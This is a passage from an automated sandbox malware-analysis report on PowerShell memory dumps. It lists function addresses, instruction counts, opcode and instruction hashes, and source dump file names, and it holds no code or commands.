                                                                      • Instruction Fuzzy Hash: 1BF0E23AB043044FD304BBAAD0053ABBBA6EBC0315F10816EC90A4B384CE3968058BE4
                                                                      Function 0352767F Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b7bdc8a3cb13c13c7229a82c60608d966dd030d75caaa85265f38732b3a734b0
                                                                      • Instruction ID: 4956a18745266d37a5997352f263df650cfc2e06603bae4bd5c514d8c20b7cc0
                                                                      • Opcode Fuzzy Hash: b7bdc8a3cb13c13c7229a82c60608d966dd030d75caaa85265f38732b3a734b0
                                                                      • Instruction Fuzzy Hash: B4F0A779300528CFD710DB5DA840A9977F6FFCD6557194199D509CB3A1DE34DC028B90
                                                                      Function 0352DE48 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 346e342515620ff55ec8f917cd784d8fc0819487bcd03510ac585fd1facf75ee
                                                                      • Instruction ID: bee154709b588ca2ee6c89f0c591f7e84c0324c79cf1018cf88e83fed0847f0d
                                                                      • Opcode Fuzzy Hash: 346e342515620ff55ec8f917cd784d8fc0819487bcd03510ac585fd1facf75ee
                                                                      • Instruction Fuzzy Hash: 27E0E5353002108FC210DB5DE498D26BBFAEFCE66532A00A9E549CB771DA61EC01CB90
                                                                      Function 0352C33F Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0876c9e5bfa09353f5674e6f308861a6e8fb022e0d668bad184391504ec933e
                                                                      • Instruction ID: 81319c03a25cba244be236eaf957c65ca02647004efd63189f1220729d954962
                                                                      • Opcode Fuzzy Hash: c0876c9e5bfa09353f5674e6f308861a6e8fb022e0d668bad184391504ec933e
                                                                      • Instruction Fuzzy Hash: 3EE092373042214BD314D27AA494EABABE6EBD9360F18443DD94AC73E2DD628802C650
                                                                      Function 0352E92E Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af4a04619a927f239d1d38f023e82ca8b421fbcfcee4b9b2c5dbb5b76d125dca
                                                                      • Instruction ID: c768bf86ff1bef4d2a521dc8b1201f3b69f8111ed690838d3bfdcd73a95705be
                                                                      • Opcode Fuzzy Hash: af4a04619a927f239d1d38f023e82ca8b421fbcfcee4b9b2c5dbb5b76d125dca
                                                                      • Instruction Fuzzy Hash: 12F0BD39A42118EFCB00DB98F985D8CBBB2FF48321B158454F809AB352CB35AD01CF40
                                                                      Function 03529158 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d9ca81309ea359b5928ec9d72a99ab495d72e055bfc4a2036cea4f1c2f41c646
                                                                      • Instruction ID: ba35df79d761a06f772bd83ec140c52508367b236af44e9246de681a4d5a0d7f
                                                                      • Opcode Fuzzy Hash: d9ca81309ea359b5928ec9d72a99ab495d72e055bfc4a2036cea4f1c2f41c646
                                                                      • Instruction Fuzzy Hash: 1FF058709043009FE7A0DBB9D4AC7DABFE5FB85350F0445AED19ADB381DB3468858B90
                                                                      Function 0352E7A8 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 52c65d648608cd2182cd41f85ef5978bd44ddd78ea1a6bb57392593cb478d65d
                                                                      • Instruction ID: c8fd6390bb44f2c4a140c585c5df32c268c7ac3f46bd79536d09691e6f172898
                                                                      • Opcode Fuzzy Hash: 52c65d648608cd2182cd41f85ef5978bd44ddd78ea1a6bb57392593cb478d65d
                                                                      • Instruction Fuzzy Hash: 0FE06831B00216A9DF1896A8A8929DEFF64EBD9320F18047EE502B3291DA61080583A0
                                                                      Function 0352CB68 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed4050110a0b77d740a1b22167064fe5324299d6d5fabb07ca8975f209d36490
                                                                      • Instruction ID: ebb772deaa3eedf8a6bd0dd3f49302034a21ea7959baca049e14b91f8845a180
                                                                      • Opcode Fuzzy Hash: ed4050110a0b77d740a1b22167064fe5324299d6d5fabb07ca8975f209d36490
                                                                      • Instruction Fuzzy Hash: A5E0D8353043002F8114F65F9C5056EB6DEDEC69A03D4883DC18F9BA00DEB06D0183B5
                                                                      Function 0352F860 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3910c202fdbcbb3acaf4cf609fad5b0bb98c2a9f89ac034d8c6d6b3120996723
                                                                      • Instruction ID: 35c6a597d19a9438e154ae8048e37d6321aadf1c3847c94317bfc27d381d2609
                                                                      • Opcode Fuzzy Hash: 3910c202fdbcbb3acaf4cf609fad5b0bb98c2a9f89ac034d8c6d6b3120996723
                                                                      • Instruction Fuzzy Hash: D5F01270C042459FC751DFB8944615AFFB0AA46114B1486AEC954DA292FA314512C7C2
                                                                      Function 0352DC88 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f288251c30204810aab72ec114cc186e5156ccf043ee374dd53ee45a3120b809
                                                                      • Instruction ID: 891c24acb72e80f6908a3322e9503d60b09bb5968029defe75c187fdcfa4881c
                                                                      • Opcode Fuzzy Hash: f288251c30204810aab72ec114cc186e5156ccf043ee374dd53ee45a3120b809
                                                                      • Instruction Fuzzy Hash: 3CE09225601A6067C116A75EBC00A8E2AFEDFCA661B04C42AE065AB390DF94D90587E6
                                                                      Function 03529542 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fcc950ac4635d9d7768722657ed83276142cf1c7cb81dfd6efdc30a1ff1220a
                                                                      • Instruction ID: 8cedd54cbb5bb247364429522dd83dfa9703a69d8a3cc9669957c422f310d5b9
                                                                      • Opcode Fuzzy Hash: 0fcc950ac4635d9d7768722657ed83276142cf1c7cb81dfd6efdc30a1ff1220a
                                                                      • Instruction Fuzzy Hash: 54E0861BB022321BD654A2F974406FA8DDA6FC6191F09823AD905DB3D1DE60CC1143E0
                                                                      Function 0352896A Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 096d0e21f26ebda871859a5ca895f61bdb10ba7be9046cf63bc394e2efccf9b2
                                                                      • Instruction ID: 9ff5f5cc2ee2f90a735ba87788cff8179632ebae869cf01bc4e9f6c9d15d7578
                                                                      • Opcode Fuzzy Hash: 096d0e21f26ebda871859a5ca895f61bdb10ba7be9046cf63bc394e2efccf9b2
                                                                      • Instruction Fuzzy Hash: 31E0E5397082909BDB19A7B8A41C2AD7F62EBC5314F04006ED5668B281CE34181587D4
                                                                      Function 0352DCD9 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2f9de4f07683fe837df5e9729ee93d1a502285361d0ce4f7df36965fac07d1eb
                                                                      • Instruction ID: 1163fd97aeb39299b45d8174443422654b66b7fa950660a22cee3777f481e472
                                                                      • Opcode Fuzzy Hash: 2f9de4f07683fe837df5e9729ee93d1a502285361d0ce4f7df36965fac07d1eb
                                                                      • Instruction Fuzzy Hash: 7AE09235B10014A7870997A9E8404FDBFBAABCE621F04C47AED19B7390DE22590AC6E1
                                                                      Function 03529168 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ff5a159f4f93a29b9b210930be535a034ab0650690246f26567dea8c0ad06211
                                                                      • Instruction ID: 14fe4f10c6e2befbd666e787d6e3f3b9da160e720665caa66e7cbc50f580a65d
                                                                      • Opcode Fuzzy Hash: ff5a159f4f93a29b9b210930be535a034ab0650690246f26567dea8c0ad06211
                                                                      • Instruction Fuzzy Hash: D0F03970A043045FD360EBB9D49839A7BE9FB45310F00446ED15EC7380DB35A8808B90
                                                                      Function 03528978 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a65fea46f800a640f7eb44ff7aa442fcbfd1b26bc3b469ca434236e4971474f
                                                                      • Instruction ID: e34ac8873cac701231b0df81bea058977b7f36a8b57b6e6a993c229472a24b2c
                                                                      • Opcode Fuzzy Hash: 7a65fea46f800a640f7eb44ff7aa442fcbfd1b26bc3b469ca434236e4971474f
                                                                      • Instruction Fuzzy Hash: 74E020393083105BCB187BBDA40C2DD7A56EBC4720F00002FD61587381DF345C1183D9
                                                                      Function 03529550 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df4efd4b911c8d68a2b4e3bebb1da837eb068972de590bd571d42de6a8a0d974
                                                                      • Instruction ID: 023545871648301510c594a232d15739b352b97d78375b0d38930a4a8c0ccf81
                                                                      • Opcode Fuzzy Hash: df4efd4b911c8d68a2b4e3bebb1da837eb068972de590bd571d42de6a8a0d974
                                                                      • Instruction Fuzzy Hash: F4D05B17701332174554B1F974006B7E9DE9DC64A1B094236D905DF3D1EE50CC1143F5
                                                                      Function 0352DCE8 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                      • Instruction ID: 4332a9247af0a7ab8eadcfb1f99646c8e82439c95b0bc45fe7d5a294b30cc75f
                                                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                      • Instruction Fuzzy Hash: 59E08631B10014978B0CDA69E4104EDFBBAEBCD220F14847AD91AA7390DA32591586E1
                                                                      Function 0352DC98 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1e74be287df99ecef60c812ef6d853730a8fbd774a30a7488d62fd4f8ab7d849
                                                                      • Instruction ID: ae225ed013eeae1ff3a86397bdfeca5ffa0a3f885a84ae5fa4a79e12459f9a69
                                                                      • Opcode Fuzzy Hash: 1e74be287df99ecef60c812ef6d853730a8fbd774a30a7488d62fd4f8ab7d849
                                                                      • Instruction Fuzzy Hash: C2E08635700624178215E65EA40055E77EADEC5971354842ED0598B340DFA4DC0147E5
                                                                      Function 0352C580 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71ec8a7fab5d16162a7b124311cb34f82eca6c41fa85d27337cbb1c109df0b5e
                                                                      • Instruction ID: 44985e93fff3ae90ca04144617076cfd451e31e6e675ae10b956f984e09ce506
                                                                      • Opcode Fuzzy Hash: 71ec8a7fab5d16162a7b124311cb34f82eca6c41fa85d27337cbb1c109df0b5e
                                                                      • Instruction Fuzzy Hash: 4BE0863670D1501F8306B76DA8144697BE1DBD5661309006FE589C7282D9659C0587A5
                                                                      Function 0352AF88 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 28272c9c7d74a7867d45d6e9ad7486e2e4068d2da0cc9f6dd622d03cfc253cb1
                                                                      • Instruction ID: a29bc9d9cfe35336ef5c9ba43b50b7a8ac87b06b661eecf0d7b3501b43fc50c9
                                                                      • Opcode Fuzzy Hash: 28272c9c7d74a7867d45d6e9ad7486e2e4068d2da0cc9f6dd622d03cfc253cb1
                                                                      • Instruction Fuzzy Hash: 34D0C2267442E2169B18D06E34206AACFA7CBDA25171DC07DE044C7340CC518C0242D0
                                                                      Function 03528800 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e6921db7941527e4b8080fd557287e9ba2088c2c841aa6c713e766503e34712
                                                                      • Instruction ID: af8e3f7abb9ee7b1c0800b68ccac910d9a63367972c70b36b973478edce56852
                                                                      • Opcode Fuzzy Hash: 0e6921db7941527e4b8080fd557287e9ba2088c2c841aa6c713e766503e34712
                                                                      • Instruction Fuzzy Hash: 22E02635E0C249AFCB18EBF8E4424AD7FB0EB4A300F00496DD96597391EA321845CF80
                                                                      Function 03528739 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 08b7ac2739ea919865bf6359bb9541945e9a4f33d2b7e230aadca235fe5fe5ca
                                                                      • Instruction ID: 4a9f7e5fa872332f267b6420f2278a9ad75ac19a7fe70240ed9938b5d3a3618b
                                                                      • Opcode Fuzzy Hash: 08b7ac2739ea919865bf6359bb9541945e9a4f33d2b7e230aadca235fe5fe5ca
                                                                      • Instruction Fuzzy Hash: E9E0BF35819109E7CB1CBBE4E8594BD7F34FA94301F40455DE966621A5EE31164ACBC0
                                                                      Function 0352C590 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a3c84c1be1130dbc7e6458ab568a743732700e48e97cd2123b0ea01d8be20181
                                                                      • Instruction ID: dd0c185db478762ad91b16d225da882387bb5ba8e196ab4e8d290244cce8616a
                                                                      • Opcode Fuzzy Hash: a3c84c1be1130dbc7e6458ab568a743732700e48e97cd2123b0ea01d8be20181
                                                                      • Instruction Fuzzy Hash: 3FD0A7363041202B4205775FB40555977E9DBD99A2301003FE68DC3340DE21AC0183E4
                                                                      Function 0352F870 Relevance: .0, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                      • Instruction ID: 2f81295c2095cdb1964639637192395bf1190fdbb455912ee0059784b239b387
                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                      • Instruction Fuzzy Hash: A1D067B0D042199F8780EFADD94156EFFF4EB49200F6085AA9919E7351E7329A12CBD1
                                                                      Function 03528748 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fdf6010c6c8db35c5af0f287d2928c14563d416777db49196ae8ef62b5093d09
                                                                      • Instruction ID: 0de0661d12fc8eeea9c6c86d15a0f77648a6a01baf0a129ce300948021a8519a
                                                                      • Opcode Fuzzy Hash: fdf6010c6c8db35c5af0f287d2928c14563d416777db49196ae8ef62b5093d09
                                                                      • Instruction Fuzzy Hash: D8D067318091199BCB0CFBE8E85A4BDBB78FA14301F40416DD96752191EA312A5ACAC5
                                                                      Function 03528810 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8e264e54c3a8bb6d7027cd5cb62b684b8dc533b7c064c12d1a9b72baea904a12
                                                                      • Instruction ID: a7dcad01a9456191cfde1aec50168af307f9dcc7dd7583f893670fe1045dfe8a
                                                                      • Opcode Fuzzy Hash: 8e264e54c3a8bb6d7027cd5cb62b684b8dc533b7c064c12d1a9b72baea904a12
                                                                      • Instruction Fuzzy Hash: 48D01734A0820A9F8B18EFA8E44686EBFB4EB45200F004169D95993390EA316C11CFC1
                                                                      Function 0352EA57 Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5a4e366c22f6024a35034dd9d626f18d18165375707eada5537203edf993200
                                                                      • Instruction ID: 0826d85c5504e7b43d5d3cc4b107351fec8b3fb51948ea153277bd0eb9f28bc8
                                                                      • Opcode Fuzzy Hash: f5a4e366c22f6024a35034dd9d626f18d18165375707eada5537203edf993200
                                                                      • Instruction Fuzzy Hash: B5D09239A45228DFCB04DB98F895A9CF771FF84325F1084A9E515AB251CB32A912CB40
                                                                      Function 03527925 Relevance: .0, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 764446278677a520c67e74f1e1e0b542aff08c42f9f3799dded28236b3eaa050
                                                                      • Instruction ID: a358b5dc4028d94bf3acd187d32de533a345f7d066bcca419f281c5100b4ef63
                                                                      • Opcode Fuzzy Hash: 764446278677a520c67e74f1e1e0b542aff08c42f9f3799dded28236b3eaa050
                                                                      • Instruction Fuzzy Hash: 4DC04C340853449FCB159F7A90558597F61AB4222531005DDD85A5A656CE72C585CF00
                                                                      Function 03527928 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a6b908b50a1fee36147436b48566036d41a207c16ad491932115600dddf4e760
                                                                      • Instruction ID: fb95725dff7dde078eab0236d7da4977af1c9b609a5a173907f809a502ab57b2
                                                                      • Opcode Fuzzy Hash: a6b908b50a1fee36147436b48566036d41a207c16ad491932115600dddf4e760
                                                                      • Instruction Fuzzy Hash: 28B092300847088FC648AF7AA4048187729BB4261539008E9E82E0A2968E36E984CB84
                                                                      Function 03527E9C Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f410be41f1e0bb7f3089a6e9904a40ed3bc0a5a31258a224eadab3beadee049
                                                                      • Instruction ID: 9bd4588c011e3d65e85138e99d9f0dfed0b1f908753c2c3f2d17e8f91e559184
                                                                      • Opcode Fuzzy Hash: 8f410be41f1e0bb7f3089a6e9904a40ed3bc0a5a31258a224eadab3beadee049
                                                                      • Instruction Fuzzy Hash: 97A00239F101355BBF48D63B469A655B6B296C3319B0484D0ED12D8036DF38C856D582

                                                                      Non-executed Functions

                                                                      Function 07D81BE0 Relevance: 12.9, Strings: 10, Instructions: 392COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1783660389.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7d80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $c$j$84/k$84/k$J2k$J2k$J2k$J2k$J2k$r1k$r1k
                                                                      • API String ID: 0-129371963
                                                                      • Opcode ID: c02a72747fd2b0bf0db0dd6e975cfbbf7e624c8b9b6c429637d24dfb863f800d
                                                                      • Instruction ID: a550363b9a54589192ef1a72a2ea5a0a9b7d6db6bbe22a2353f155cd9743c7eb
                                                                      • Opcode Fuzzy Hash: c02a72747fd2b0bf0db0dd6e975cfbbf7e624c8b9b6c429637d24dfb863f800d
                                                                      • Instruction Fuzzy Hash: 6CD14AB1B0420ACFDB65AF6994007AAF7B6AFC6211F18C0BFD555DB241DB32C846C7A1
                                                                      Function 0352345D Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.1768473377.0000000003520000.00000040.00000800.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_3520000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p$p$p$p
                                                                      • API String ID: 0-3467077657
                                                                      • Opcode ID: f709c8e945cfe7549ad5aa6b812f64b9aa02eaf9a1a6cc69b3fc6c98a0417819
                                                                      • Instruction ID: 5ae98c1773c022e759edb42057439964946e228a819b5f3da6c0e2c6454d8884
                                                                      • Opcode Fuzzy Hash: f709c8e945cfe7549ad5aa6b812f64b9aa02eaf9a1a6cc69b3fc6c98a0417819
                                                                      • Instruction Fuzzy Hash: 8831008690E7D16FE3039738A8752C57F215E53028B4E41DBC4D48F1A7E40A8A4EC7BB

                                                                      Executed Functions

                                                                      Function 04A8B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.1806296574.0000000004A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A80000, based on PE: false
